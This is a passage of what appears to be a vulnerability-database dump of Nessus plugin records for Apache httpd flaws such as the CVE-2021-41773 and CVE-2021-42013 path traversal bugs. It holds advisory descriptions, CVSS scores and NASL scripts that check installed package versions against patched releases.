Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. 
If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:54", "description": "The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a vulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_51.NASL", "href": "https://www.tenable.com/plugins/nessus/153952", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153952);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n 
script_name(english:\"Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a\nvulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a\n path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.51 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.49', 'fixed_version' : '2.4.51' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:27", "description": "The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. 
This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. 
(CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd24 (ALAS-2021-1543)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": 
["p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_md", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:mod24_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1543.NASL", "href": "https://www.tenable.com/plugins/nessus/154188", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1543.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154188);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1543\");\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2021-1543)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. 
It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. 
This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1543.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", 
value:\n\"Run 'yum update httpd24' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:mod24_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'x86_64', 
'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-manual-2.4.51-1.94.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 
package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:10", "description": "The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. 
This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. 
(CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : httpd (ALAS-2021-1716)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-filesystem", 